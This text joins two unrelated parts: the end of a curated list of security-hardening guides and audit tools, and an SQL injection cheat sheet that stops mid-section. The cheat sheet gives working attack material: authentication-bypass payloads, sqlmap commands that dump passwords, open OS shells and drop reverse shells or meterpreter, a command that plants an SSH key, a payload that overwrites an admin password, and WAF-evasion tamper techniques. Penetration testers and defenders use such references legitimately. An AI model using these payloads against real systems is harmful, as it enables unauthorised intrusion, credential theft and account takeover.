- [Microsoft - Best Practices for Securing Active Directory](https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/best-practices-for-securing-active-directory)
- [ANSSI CERT-FR - Active Directory Security Assessment Checklist](https://www.cert.ssi.gouv.fr/uploads/guide-ad.html) - [other version with changelog](https://www.cert.ssi.gouv.fr/uploads/ad_checklist.html) - 2022 (English and French versions)
- ["Admin Free" Active Directory and Windows, Part 1- Understanding Privileged Groups in AD](https://blogs.technet.microsoft.com/lrobins/2011/06/23/admin-free-active-directory-and-windows-part-1-understanding-privileged-groups-in-ad/)
- ["Admin Free" Active Directory and Windows, Part 2- Protected Accounts and Groups in Active Directory](https://blogs.technet.microsoft.com/lrobins/2011/06/23/admin-free-active-directory-and-windows-part-2-protected-accounts-and-groups-in-active-directory/)
### ADFS
- [adsecurity.org - Securing Microsoft Active Directory Federation Server (ADFS)](https://adsecurity.org/?p=3782)
- [Microsoft - Best practices for securing Active Directory Federation Services](https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/best-practices-securing-ad-fs)
### Kerberos
- [CIS MIT Kerberos 1.10 Benchmark](https://www.cisecurity.org/benchmark/mit_kerberos/) - 2012
### LDAP
- [OpenLDAP Software 2.4 Administrator's Guide - OpenLDAP Security Considerations](http://www.openldap.org/doc/admin24/security.html)
- [Best Practices in LDAP Security](https://www.skills-1st.co.uk/papers/ldap-best-2011/best-practices-in-ldap-security.pdf) (2011)
- [LDAP: Hardening Server Security (so administrators can sleep at night)](https://ff1959.wordpress.com/2013/07/31/ldap-hardening-server-security-so-administrators-can-sleep-at-night/)
- [LDAP Authentication Best Practices](http://web.archive.org/web/20130801091446/http://www.ldapguru.info/ldap/authentication-best-practices.html) - retrieved from web.archive.org
- [Hardening OpenLDAP on Linux with AppArmor and systemd](http://www.openldap.org/conf/odd-tuebingen-2018/Michael1.pdf) - slides
- [zytrax LDAP for Rocket Scientists - LDAP Security](http://www.zytrax.com/books/ldap/ch15/)
- [How To Encrypt OpenLDAP Connections Using STARTTLS](https://www.digitalocean.com/community/tutorials/how-to-encrypt-openldap-connections-using-starttls)
### DNS
- [CIS - BIND DNS Server 9.9 Benchmark](https://www.cisecurity.org/benchmark/bind/) (2017)
- [DISA STIGs - BIND 9.x](https://public.cyber.mil/stigs/compilations/) (2019)
- [NIST SP 800-81-2 - Secure Domain Name System (DNS) Deployment Guide](https://csrc.nist.gov/publications/detail/sp/800-81/2/final) (2013)
- [CMU SEI - Six Best Practices for Securing a Robust Domain Name System (DNS) Infrastructure](https://insights.sei.cmu.edu/sei_blog/2017/02/six-best-practices-for-securing-a-robust-domain-name-system-dns-infrastructure.html)
- [NSA BIND 9 DNS Security](https://apps.nsa.gov/iaarchive/library/ia-guidance/security-configuration/applications/bind-9-dns-security.cfm) (2011)
### NTP
- [IETF - Network Time Protocol Best Current Practices draft-ietf-ntp-bcp](https://tools.ietf.org/html/draft-ietf-ntp-bcp-13) (last draft #13 in March 2019)
- [CMU SEI - Best Practices for NTP Services](https://insights.sei.cmu.edu/sei_blog/2017/04/best-practices-for-ntp-services.html)
- [Linux.com - Arrive On Time With NTP -- Part 2: Security Options](https://www.linux.com/learn/arrive-time-ntp-part-2-security-options)
- [Linux.com - Arrive On Time With NTP -- Part 3: Secure Setup](https://www.linux.com/learn/2017/2/arrive-time-ntp-part-3-secure-setup)
### NFS
- [Linux NFS-HOWTO - Security and NFS](https://www.tldp.org/HOWTO/NFS-HOWTO/security.html) - a good overview of NFS security issues and some mitigations
- [Red Hat - A Guide to Securing Red Hat Enterprise Linux 7 - Securing NFS](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html-single/security_guide/index#sec-Securing_NFS)
- [Red Hat - RHEL7 Storage Administration Guide - Securing NFS](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/storage_administration_guide/s1-nfs-security)
- [NFSv4 without Kerberos and permissions](https://lists.debian.org/debian-user/2017/10/msg00476.html) - why NFSv4 without Kerberos does not provide security
- [CertDepot - RHEL7: Use Kerberos to control access to NFS network shares](https://www.certdepot.net/rhel7-use-kerberos-control-access-nfs-network-shares/)
### CUPS
- [CUPS Server Security](https://www.cups.org/doc/security.html)
## Authentication - Passwords
- [UK NCSC - Password administration for system owners](https://www.ncsc.gov.uk/collection/passwords)
- [NIST SP 800-63 Digital Identity Guidelines](https://pages.nist.gov/800-63-3/)
- [OWASP Password Storage Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html)
- [ANSSI - Recommendations on multi-factor authentication and passwords](https://www.ssi.gouv.fr/guide/recommandations-relatives-a-lauthentification-multifacteur-et-aux-mots-de-passe/) (2021, French)
## Hardware - CPU - BIOS - UEFI
- [ANSSI - Hardware security requirements for x86 platforms](https://www.ssi.gouv.fr/en/guide/hardware-security-requirements-for-x86-platforms/) - recommendations for security features and configuration options applying to hardware devices (CPU, BIOS, UEFI, etc) (Nov 2019)
- [NSA - Hardware and Firmware Security Guidance](https://github.com/nsacyber/Hardware-and-Firmware-Security-Guidance) - Guidance for the Spectre, Meltdown, Speculative Store Bypass, Rogue System Register Read, Lazy FP State Restore, Bounds Check Bypass Store, TLBleed, and L1TF/Foreshadow vulnerabilities as well as general hardware and firmware security guidance.
- [NSA Info Sheet: UEFI Lockdown Quick Guidance (March 2018)](https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-uefi-lockdown.pdf?v=1)
- [NSA Tech Report: UEFI Defensive Practices Guidance (July 2017)](https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/ctr-uefi-defensive-practices-guidance.pdf?ver=2018-11-06-074836-090)
## Cloud
- [NSA Info Sheet: Cloud Security Basics (August 2018)](https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-cloud-security-basics.pdf?v=1)
- [DISA DoD Cloud Computing Security](https://public.cyber.mil/dccs/)
- [asecure.cloud - Build a Secure Cloud](https://asecure.cloud/) - A free repository of customizable AWS security configurations and best practices
# Tools
## Tools to check security hardening
- [Chef InSpec](https://www.inspec.io/) - open-source testing framework by Chef that enables you to specify compliance, security, and other policy requirements. can run on Windows and many Linux distributions.
### GNU/Linux
- [Lynis](https://cisofy.com/lynis/) - script to check the configuration of Linux hosts
- [OpenSCAP Base](https://www.open-scap.org/tools/openscap-base/) - oscap command line tool
- [SCAP Workbench](https://www.open-scap.org/tools/scap-workbench/) - GUI for oscap
- [Tiger - The Unix security audit and intrusion detection tool](https://www.nongnu.org/tiger/) (might be outdated)
- [otseca](https://github.com/trimstray/otseca) - Open source security auditing tool to search and dump system configuration. It allows you to generate reports in HTML or RAW-HTML formats.
- [SUDO_KILLER](https://github.com/TH3xACE/SUDO_KILLER) - A tool to identify sudo rules' misconfigurations and vulnerabilities within sudo
- [CIS Benchmarks Audit](https://github.com/finalduty/cis_benchmarks_audit) - bash script which performs tests against your CentOS system to give an indication of whether the running server may comply with the CIS v2.2.0 Benchmarks for CentOS (only CentOS 7 for now)
### Windows
- [Microsoft Security Compliance Toolkit 1.0](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-compliance-toolkit-10) - set of tools that allows enterprise security administrators to download, analyze, test, edit, and store Microsoft-recommended security configuration baselines for Windows and other Microsoft products
- [Microsoft DSC Environment Analyzer (DSCEA)](https://microsoft.github.io/DSCEA/) - simple implementation of PowerShell Desired State Configuration that uses the declarative nature of DSC to scan Windows OS based systems in an environment against a defined reference MOF file and generate compliance reports as to whether systems match the desired configuration
- [HardeningAuditor](https://github.com/cottinghamd/HardeningAuditor/) - Scripts for comparing Microsoft Windows compliance with the Australian ASD 1709 & Office 2016 Hardening Guides
- [PingCastle](https://www.pingcastle.com/) - Tool to check the security of Active Directory
- [MDE-AuditCheck](https://github.com/olafhartong/MDE-AuditCheck) - Tool to check that Windows audit settings are properly configured in the GPO for Microsoft Defender for Endpoint
### Network Devices
- [Nipper-ng](https://github.com/arpitn30/nipper-ng) - to check the configuration of network devices (does not seem to be updated)
### TLS/SSL
- [Qualys SSL Labs - List of tools to assess TLS/SSL servers and clients](https://github.com/ssllabs/research/wiki/Assessment-Tools)
### SSH
- [ssh-audit](https://github.com/arthepsy/ssh-audit) - SSH server auditing (banner, key exchange, encryption, mac, compression, compatibility, security, etc)
### Hardware - CPU - BIOS - UEFI
- [CHIPSEC: Platform Security Assessment Framework](https://github.com/chipsec/chipsec) - framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components
- [chipsec-check](https://github.com/ANSSI-FR/chipsec-check) - Tools to generate a Debian Linux distribution with chipsec to test hardware requirements
### Docker
- [Docker Bench for Security](https://github.com/docker/docker-bench-security) - script that checks for dozens of common best-practices around deploying Docker containers in production, inspired by the CIS Docker Community Edition Benchmark v1.1.0.
### Cloud
- [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) - List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
## Tools to apply security hardening
- [DevSec Hardening Framework](https://dev-sec.io/) - a framework to automate hardening of OS and applications, using Chef, Ansible and Puppet
### GNU/Linux
- [Linux Server Hardener](https://github.com/pratiktri/server_init_harden) - for Debian/Ubuntu (2019)
- [Bastille Linux](http://bastille-linux.sourceforge.net/) - outdated
### Windows
- [Microsoft Security Compliance Toolkit 1.0](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-compliance-toolkit-10) - set of tools that allows enterprise security administrators to download, analyze, test, edit, and store Microsoft-recommended security configuration baselines for Windows and other Microsoft products
- [Hardentools](https://github.com/securitywithoutborders/hardentools) - for Windows individual users (not corporate environments) at risk, who might want an extra level of security at the price of some usability.
- [Windows 10 Hardening](https://github.com/aghorler/Windows-10-Hardening) - A collective resource of settings modifications (mostly opt-outs) that attempt to make Windows 10 as private and as secure as possible.
- [Disassembler0 Windows 10 Initial Setup Script](https://github.com/Disassembler0/Win10-Initial-Setup-Script) - PowerShell script for automation of routine tasks done after fresh installations of Windows 10 / Server 2016 / Server 2019
- [Automated-AD-Setup](https://github.com/OneLogicalMyth/Automated-AD-Setup) - A PowerShell script that aims to have a fully configured domain built in under 10 minutes, but also apply security configuration and hardening
- [mackwage/windows_hardening.cmd](https://gist.github.com/mackwage/08604751462126599d7e52f233490efe) - Script to perform some hardening of Windows 10
### TLS/SSL
- [Mozilla SSL Configuration Generator](https://ssl-config.mozilla.org/)
### Cloud
- [toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) - List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc.
## Password Generators
- [How-To Geek - 10 Ways to Generate a Random Password from the Linux Command Line](https://www.howtogeek.com/howto/30184/10-ways-to-generate-a-random-password-from-the-command-line/)
- [Vitux - 8 Ways to Generate a Random Password on Linux Shell](https://vitux.com/generation-of-a-random-password-on-linux-shell/)
- [SS64 - Password security and a comparison of Password Generators](https://ss64.com/docs/security.html)
# Books
# Other Awesome Lists
- [Awesome Cybersecurity Blue Team](https://github.com/fabacab/awesome-cybersecurity-blueteam) - A curated collection of awesome resources, tools, and other shiny things for cybersecurity blue teams.
## Other Awesome Security Lists
(borrowed from [Awesome Security](https://github.com/sbilly/awesome-security))
- [Awesome Security](https://github.com/sbilly/awesome-security) - A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.
- [Android Security Awesome](https://github.com/ashishb/android-security-awesome) - A collection of android security related resources.
- [Awesome CTF](https://github.com/apsdehal/awesome-ctf) - A curated list of CTF frameworks, libraries, resources and software.
- [Awesome Cyber Skills](https://github.com/joe-shenouda/awesome-cyber-skills) - A curated list of hacking environments where you can train your cyber skills legally and safely.
- [Awesome Hacking](https://github.com/carpedm20/awesome-hacking) - A curated list of awesome Hacking tutorials, tools and resources.
- [Awesome Honeypots](https://github.com/paralax/awesome-honeypots) - An awesome list of honeypot resources.
- [Awesome Malware Analysis](https://github.com/rshipp/awesome-malware-analysis) - A curated list of awesome malware analysis tools and resources.
- [Awesome PCAP Tools](https://github.com/caesar0301/awesome-pcaptools) - A collection of tools developed by other researchers in the Computer Science area to process network traces.
- [Awesome Pentest](https://github.com/enaqx/awesome-pentest) - A collection of awesome penetration testing resources, tools and other shiny things.
- [Awesome Linux Containers](https://github.com/Friz-zy/awesome-linux-containers) - A curated list of awesome Linux Containers frameworks, libraries and software.
- [Awesome Incident Response](https://github.com/meirwah/awesome-incident-response) - A curated list of resources for incident response.
- [Awesome Web Hacking](https://github.com/infoslack/awesome-web-hacking) - This list is for anyone wishing to learn about web application security but do not have a starting point.
- [Awesome Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence) - A curated list of threat intelligence resources.
- [Awesome Pentest Cheat Sheets](https://github.com/coreb1t/awesome-pentest-cheat-sheets) - Collection of the cheat sheets useful for pentesting
- [Awesome Industrial Control System Security](https://github.com/mpesen/awesome-industrial-control-system-security) - A curated list of resources related to Industrial Control System (ICS) security.
- [Awesome YARA](https://github.com/InQuest/awesome-yara) - A curated list of awesome YARA rules, tools, and people.
- [Awesome Threat Detection and Hunting](https://github.com/0x4D31/awesome-threat-detection) - A curated list of awesome threat detection and hunting resources.
- [Awesome Container Security](https://github.com/kai5263499/container-security-awesome) - A curated list of awesome resources related to container building and runtime security
- [Awesome Crypto Papers](https://github.com/pFarb/awesome-crypto-papers) - A curated list of cryptography papers, articles, tutorials and howtos.
|
# SQL injection
> A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.
Attempting to manipulate SQL queries may have goals including:
- Information Leakage
- Disclosure of stored data
- Manipulation of stored data
- Bypassing authorisation controls
## Summary
* [CheatSheet MSSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MSSQL%20Injection.md)
* [CheatSheet MySQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md)
* [CheatSheet OracleSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/OracleSQL%20Injection.md)
* [CheatSheet PostgreSQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
* [CheatSheet SQLite Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md)
* [CheatSheet Cassandra Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/Cassandra%20Injection.md)
* [Entry point detection](#entry-point-detection)
* [DBMS Identification](#dbms-identification)
* [SQL injection using SQLmap](#sql-injection-using-sqlmap)
* [Basic arguments for SQLmap](#basic-arguments-for-sqlmap)
* [Load a request file and use mobile user-agent](#load-a-request-file-and-use-mobile-user-agent)
* [Custom injection in UserAgent/Header/Referer/Cookie](#custom-injection-in-useragentheaderreferercookie)
* [Second order injection](#second-order-injection)
* [Shell](#shell)
* [Crawl a website with SQLmap and auto-exploit](#crawl-a-website-with-sqlmap-and-auto-exploit)
* [Using TOR with SQLmap](#using-tor-with-sqlmap)
* [Using a proxy with SQLmap](#using-a-proxy-with-sqlmap)
* [Using Chrome cookie and a Proxy](#using-chrome-cookie-and-a-proxy)
* [Using suffix to tamper the injection](#using-suffix-to-tamper-the-injection)
* [General tamper option and tamper's list](#general-tamper-option-and-tampers-list)
* [SQLmap without SQL injection](#sqlmap-without-sql-injection)
* [Authentication bypass](#authentication-bypass)
* [Authentication Bypass (Raw MD5 SHA1)](#authentication-bypass-raw-md5-sha1)
* [Polyglot injection](#polyglot-injection-multicontext)
* [Routed injection](#routed-injection)
* [Insert Statement - ON DUPLICATE KEY UPDATE](#insert-statement---on-duplicate-key-update)
* [WAF Bypass](#waf-bypass)
## Entry point detection
Detection of an SQL injection entry point
Simple characters
```sql
'
%27
"
%22
#
%23
;
%3B
)
Wildcard (*)
' # required for XML content
```
Multiple encoding
```sql
%%2727
%25%27
```
Merging characters
```sql
`+HERP
'||'DERP
'+'herp
' 'DERP
'%20'HERP
'%2B'HERP
```
Logic Testing
```sql
page.asp?id=1 or 1=1 -- true
page.asp?id=1' or 1=1 -- true
page.asp?id=1" or 1=1 -- true
page.asp?id=1 and 1=2 -- false
```
Weird characters
```sql
Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
transformed into U+0022 QUOTATION MARK (")
Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
transformed into U+0027 APOSTROPHE (')
```
## DBMS Identification
```c
["conv('a',16,2)=conv('a',16,2)" ,"MYSQL"],
["connection_id()=connection_id()" ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')" ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)" ,"MSSQL"],
["@@CONNECTIONS>0" ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS" ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY" ,"MSSQL"],
["USER_ID(1)=USER_ID(1)" ,"MSSQL"],
["ROWNUM=ROWNUM" ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')" ,"ORACLE"],
["LNNVL(0=123)" ,"ORACLE"],
["5::int=5" ,"POSTGRESQL"],
["5::integer=5" ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()" ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)" ,"POSTGRESQL"],
["current_database()=current_database()" ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()" ,"SQLITE"],
["last_insert_rowid()>1" ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()" ,"SQLITE"],
["val(cvar(1))=1" ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0" ,"MSACCESS"],
["cdbl(1)=cdbl(1)" ,"MSACCESS"],
["1337=1337", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'", "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
```
## SQL injection using SQLmap
### Basic arguments for SQLmap
```powershell
sqlmap --url="<url>" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs
```
### Load a request file and use mobile user-agent
```powershell
sqlmap -r sqli.req --safe-url=http://10.10.10.10/ --mobile --safe-freq=1
```
### Custom injection in UserAgent/Header/Referer/Cookie
```powershell
python sqlmap.py -u "http://example.com" --data "username=admin&password=pass" --headers="x-forwarded-for:127.0.0.1*"
The injection is located at the '*'
```
### Second order injection
```powershell
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://<IP/domain>/joomla/administrator/index.php" -D "joomla" -dbs
```
### Shell
```powershell
SQL Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --sql-shell
Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
SSH Shell by dropping an SSH key
python sqlmap.py -u "http://example.com/?id=1" -p id --file-write=/root/.ssh/id_rsa.pub --file-destination=/home/user/.ssh/
```
### Crawl a website with SQLmap and auto-exploit
```powershell
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
### Using TOR with SQLmap
```powershell
sqlmap -u "http://www.target.com" --tor --tor-type=SOCKS5 --time-sec 11 --check-tor --level=5 --risk=3 --threads=5
```
### Using a proxy with SQLmap
```powershell
sqlmap -u "http://www.target.com" --proxy="http://127.0.0.1:8080"
```
### Using Chrome cookie and a Proxy
```powershell
sqlmap -u "https://test.com/index.php?id=99" --load-cookie=/media/truecrypt1/TI/cookie.txt --proxy "http://127.0.0.1:8080" -f --time-sec 15 --level 3
```
### Using suffix to tamper the injection
```powershell
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
### General tamper option and tamper's list
```powershell
tamper=name_of_the_tamper
```
| Tamper | Description |
| --- | --- |
|0x2char.py | Replaces each (MySQL) 0x<hex> encoded string with equivalent CONCAT(CHAR(),…) counterpart |
|apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart |
|apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart|
|appendnullbyte.py | Appends encoded NULL byte character at the end of payload |
|base64encode.py | Base64 all characters in a given payload |
|between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' |
|bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator |
|chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) |
|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) |
|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) |
|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) |
|commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'|
|commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'|
|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() |
|concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
|charencode.py | Url-encodes all characters in a given payload (not processing already encoded) |
|charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) |
|equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE' |
|escapequotes.py | Slash escape quotes (' and ") |
|greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
|halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword |
|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') |
|ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart|
|ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'|
|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier |
|least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart |
|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) |
|modsecurityversioned.py | Embraces complete query with versioned comment |
|modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment |
|multiplespaces.py | Adds multiple spaces around SQL keywords |
|nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters|
|overlongutf8.py | Converts all characters in a given payload (not processing already encoded) |
|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) |
|percentage.py | Adds a percentage sign ('%') infront of each character |
|plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart |
|plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart |
|randomcase.py | Replaces each keyword character with random case value |
|randomcomments.py | Add random comments to SQL keywords|
|securesphere.py | Appends special crafted string |
|sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs |
|space2comment.py | Replaces space character (' ') with comments |
|space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') |
|space2hash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2morehash.py | Replaces space character (' ') with a pound character ('#') followed by a random string and a new line ('\n') |
|space2mssqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mssqlhash.py | Replaces space character (' ') with a pound character ('#') followed by a new line ('\n') |
|space2mysqlblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|space2mysqldash.py | Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n') |
|space2plus.py | Replaces space character (' ') with plus ('+') |
|space2randomblank.py | Replaces space character (' ') with a random blank character from a valid set of alternate characters |
|symboliclogical.py | Replaces AND and OR logical operators with their symbolic counterparts (&& and ||) |
|unionalltounion.py | Replaces UNION ALL SELECT with UNION SELECT |
|unmagicquotes.py | Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work) |
|uppercase.py | Replaces each keyword character with upper case value 'INSERT'|
|varnish.py | Append a HTTP header 'X-originating-IP' |
|versionedkeywords.py | Encloses each non-function keyword with versioned MySQL comment |
|versionedmorekeywords.py | Encloses each keyword with versioned MySQL comment |
|xforwardedfor.py | Append a fake HTTP header 'X-Forwarded-For'|
### SQLmap without SQL injection
You can use SQLmap to access a database via its port instead of a URL.
```ps1
sqlmap.py -d "mysql://user:pass@ip/database" --dump-all
```
## Authentication bypass
```sql
'-'
' '
'&'
'^'
'*'
' or 1=1 limit 1 -- -+
'="or'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
'-||0'
"-||0"
"-"
" "
"&"
"^"
"*"
'--'
"--"
'--' / "--"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 2 like 2
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' -- -
admin' #
admin'/*
admin' or '2' LIKE '1
admin' or 2 LIKE 2--
admin' or 2 LIKE 2#
admin') or 2 LIKE 2#
admin') or 2 LIKE 2--
admin') or ('2' LIKE '2
admin') or ('2' LIKE '2'#
admin') or ('2' LIKE '2'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin';-- azer
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
```
## Authentication Bypass (Raw MD5 SHA1)
When a raw md5 is used, the pass will be queried as a simple string, not a hexstring.
```php
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
Allowing an attacker to craft a string with a `true` statement such as `' or 'SOMETHING`
```php
md5("ffifdyop", true) = 'or'6�]��!r,��b
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
```
Challenge demo available at [http://web.jarvisoj.com:32772](http://web.jarvisoj.com:32772)
## Polyglot injection (multicontext)
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
/* MySQL only */
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/
```
## Routed injection
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
## Insert Statement - ON DUPLICATE KEY UPDATE
ON DUPLICATE KEY UPDATE keywords is used to tell MySQL what to do when the application tries to insert a row that already exists in the table. We can use this to change the admin password by:
```sql
Inject using payload:
attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" --
The query would look like this:
INSERT INTO users (email, password) VALUES ("attacker_dummy@example.com", "bcrypt_hash_of_qwerty"), ("admin@example.com", "bcrypt_hash_of_qwerty") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_qwerty" -- ", "bcrypt_hash_of_your_password_input");
This query will insert a row for the user “attacker_dummy@example.com”. It will also insert a row for the user “admin@example.com”.
Because this row already exists, the ON DUPLICATE KEY UPDATE keyword tells MySQL to update the `password` column of the already existing row to "bcrypt_hash_of_qwerty".
After this, we can simply authenticate with “admin@example.com” and the password “qwerty”!
```
## WAF Bypass
### White spaces alternatives
No Space (%20) - bypass using whitespace alternatives
```sql
?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--
```
No Whitespace - bypass using comments
```sql
?id=1/*comment*/and/**/1=1/**/--
```
No Whitespace - bypass using parenthesis
```sql
?id=(1)and(1)=(1)--
```
Whitespace alternatives by DBMS
